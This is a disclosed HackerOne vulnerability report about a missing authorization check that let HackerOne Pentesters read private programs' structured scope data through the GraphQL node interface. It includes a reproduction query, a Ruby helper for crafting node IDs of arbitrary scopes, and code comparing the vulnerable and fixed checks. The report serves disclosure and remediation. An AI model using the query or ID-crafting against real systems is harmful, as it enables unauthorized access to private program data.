HackerOne Pentesters can access any structured scope object through GraphQL node interface
High
HackerOne
Reported by
jobert
Vulnerability Details
Technical details and impact analysis
A missing authorization check in the `StructuredScope` protector class (`app/protectors/protected_structured_scope.rb:42`) enables any HackerOne Pentester to read structured scope objects of programs they aren't invited to and for which they aren't running a penetration test through HackerOne. The group condition only checks that the user holds the global pentester role and that the scope's team is allowed to invite hackers; nothing ties the requesting user to that particular team.
```ruby
class ProtectedStructuredScope
  # ...
  # CAN_INVITE_HACKERS is a property of the scope's team, not of the
  # requesting user: every scope whose team may invite hackers satisfies it.
  property(:CAN_INVITE_HACKERS) do
    StructuredScope.unscoped
                   .joins(:team)
                   .merge(Team.that_can_invite_hackers)
  end

  group(
    # ...
    # The role is global (any H1 pentester) and the feature is per-team;
    # no check links this user to this team's pentest.
    (has_role(H1_PENTESTER) & has_feature(CAN_INVITE_HACKERS)),
  ) do
    allow :id
    allow :asset_identifier
    allow :asset_type
    allow :eligible_for_bounty
    allow :eligible_for_submission
    allow :instruction
    allow :rendered_instruction
    allow :availability_requirement
    allow :confidentiality_requirement
    allow :integrity_requirement
    allow :max_severity
    allow :archived_at
    allow :updated_at
    # ...
  end
```
The `H1_PENTESTER` role is defined as:
```ruby
# Any verified user with the h1_pentester flag set qualifies; the scope
# carries no program or pentest context.
scope :user_is_hackerone_pentester, ->(user) do
  verified.where(
    User.where(id: user).where.not(id: nil)
        .where(User.arel_table[:h1_pentester].eq(true))
        .select(1).arel.exists,
  )
end
```
The authorization logic should additionally check whether the user has access to the structured scope through a `Pentest` object, i.e. whether they are assigned to a HackerOne penetration test of the program that owns the scope.
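As an added illustration (not HackerOne's code), the following plain-Ruby model puts the vulnerable group condition next to a version that also requires a `Pentest` linking the user to the scope's team. The structs, the `Pentest#pentester_ids` association, the `resolve_node` helper and all fixture data are assumptions made for the example; the real protector and models are not reproduced here.

```ruby
# Added example, not HackerOne's code. Structs, fixture data and the
# Pentest#pentester_ids association are assumptions for illustration.
User            = Struct.new(:id, :verified, :h1_pentester)
Team            = Struct.new(:id, :can_invite_hackers)
StructuredScope = Struct.new(:id, :team_id, :asset_identifier, :asset_type)
Pentest         = Struct.new(:team_id, :pentester_ids)

# Stands in for has_role(H1_PENTESTER): the user_is_hackerone_pentester
# scope only needs a verified user whose h1_pentester flag is set.
def h1_pentester?(user)
  !user.nil? && user.verified == true && user.h1_pentester == true
end

# Stands in for has_feature(CAN_INVITE_HACKERS): a property of the scope's
# team that says nothing about the requesting user. Together with the role
# check this is the entire condition of the vulnerable group().
def vulnerable_allows?(user, scope, teams)
  h1_pentester?(user) && teams.fetch(scope.team_id).can_invite_hackers == true
end

# Hardened condition: the user must also be assigned to a Pentest of the
# team that owns the scope, i.e. an object-level check.
def fixed_allows?(user, scope, teams, pentests)
  return false unless vulnerable_allows?(user, scope, teams)
  pentests.any? { |p| p.team_id == scope.team_id && p.pentester_ids.include?(user.id) }
end

# Mimics the node() lookup: the allowed fields as a Hash, or nil when the
# protector denies access (GraphQL would return node: null).
ALLOWED_FIELDS = %i[id asset_identifier asset_type].freeze

def resolve_node(user, scope_id, fixtures, fixed:)
  scope = fixtures[:scopes][scope_id]
  return nil if scope.nil?
  allowed = if fixed
              fixed_allows?(user, scope, fixtures[:teams], fixtures[:pentests])
            else
              vulnerable_allows?(user, scope, fixtures[:teams])
            end
  return nil unless allowed
  ALLOWED_FIELDS.to_h { |f| [f, scope.public_send(f)] }
end

# Constructed fixtures: two private programs that can invite hackers; only
# team 10 runs a HackerOne pentest, and only bob (id 2) is assigned to it.
FIXTURES = {
  teams: { 10 => Team.new(10, true), 20 => Team.new(20, true) },
  scopes: {
    1 => StructuredScope.new(1, 10, 'api.private-one.example', 'URL'),
    2 => StructuredScope.new(2, 20, 'com.private-two.app', 'GOOGLE_PLAY_APP_ID')
  },
  pentests: [Pentest.new(10, [2])]
}.freeze

ALICE = User.new(1, true, true)   # H1 pentester with no pentest assignment
BOB   = User.new(2, true, true)   # H1 pentester assigned to team 10's pentest
CAROL = User.new(3, true, false)  # ordinary verified hacker

if __FILE__ == $PROGRAM_NAME
  { 'alice' => ALICE, 'bob' => BOB, 'carol' => CAROL }.each do |name, user|
    FIXTURES[:scopes].each_key do |sid|
      vuln  = resolve_node(user, sid, FIXTURES, fixed: false)
      fixed = resolve_node(user, sid, FIXTURES, fixed: true)
      puts format('%-6s scope %d  vulnerable: %-7s fixed: %s',
                  name, sid, vuln ? 'allowed' : 'denied', fixed ? 'allowed' : 'denied')
    end
  end
end
```

With the vulnerable predicate alice, who is assigned to no pentest, reads both private scopes; with the object-level check she reads neither, and bob reads only the scope of the team whose pentest he is on.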
To reproduce, the following GraphQL query can be used:
```graphql
query {
  node(id: "Z2lkOi8vaGFja2Vyb25lL1N0cnVjdHVyZWRTY29wZS8x") {
    ... on StructuredScope {
      _id
      asset_identifier
      asset_type
    }
  }
}
```
Replace the node ID with that of any structured scope belonging to a private program (the ID above is the base64 encoding of `gid://hackerone/StructuredScope/1`) and the query returns the attributes the protector allows.
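As an added example (not part of the report or HackerOne's code), the helper below decodes and builds the node IDs the query above uses. It assumes only that node IDs are base64-encoded Rails global IDs of the form `gid://hackerone/<Model>/<id>`, which is what the ID in the report decodes to; the `decode_node_id`, `encode_node_id` and `structured_scope_query` names are the example's own.

```ruby
# Added example, not HackerOne's code. Assumes node IDs are base64-encoded
# Rails global IDs (gid://hackerone/<Model>/<id>), as the report's ID is.
GID_RE = %r{\Agid://(?<app>[^/]+)/(?<model>[^/]+)/(?<id>\d+)\z}

# Decode a node ID into its app, model and numeric id, rejecting anything
# that is not well-formed base64 or not a global ID.
def decode_node_id(node_id)
  gid = node_id.unpack1('m0').force_encoding(Encoding::UTF_8) # strict base64
  m = GID_RE.match(gid)
  raise ArgumentError, "not a global id: #{gid.inspect}" unless m
  { app: m[:app], model: m[:model], id: Integer(m[:id], 10) }
end

# Build the node ID for an arbitrary record, which is all that swapping the
# ID in the reproduction query requires.
def encode_node_id(model, id, app: 'hackerone')
  ["gid://#{app}/#{model}/#{Integer(id)}"].pack('m0')
end

# The reproduction query from the report, parameterised by scope id.
def structured_scope_query(scope_id)
  <<~GQL
    query {
      node(id: "#{encode_node_id('StructuredScope', scope_id)}") {
        ... on StructuredScope {
          _id
          asset_identifier
          asset_type
        }
      }
    }
  GQL
end

if __FILE__ == $PROGRAM_NAME
  p decode_node_id('Z2lkOi8vaGFja2Vyb25lL1N0cnVjdHVyZWRTY29wZS8x')
  puts structured_scope_query(2)
end
```

Because the identifier is a plain global ID rather than an opaque token, the only thing standing between a caller and another program's scope is the protector itself, which is why the missing check is directly exploitable through the generic `node` interface.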
## Impact
HackerOne Pentesters, although they have more access than normal users, can obtain information from private programs they don't have access to and aren't doing a penetration test for through HackerOne.
Report Details
Additional information and metadata
State
Closed
Substate
Resolved
Weakness
Improper Access Control - Generic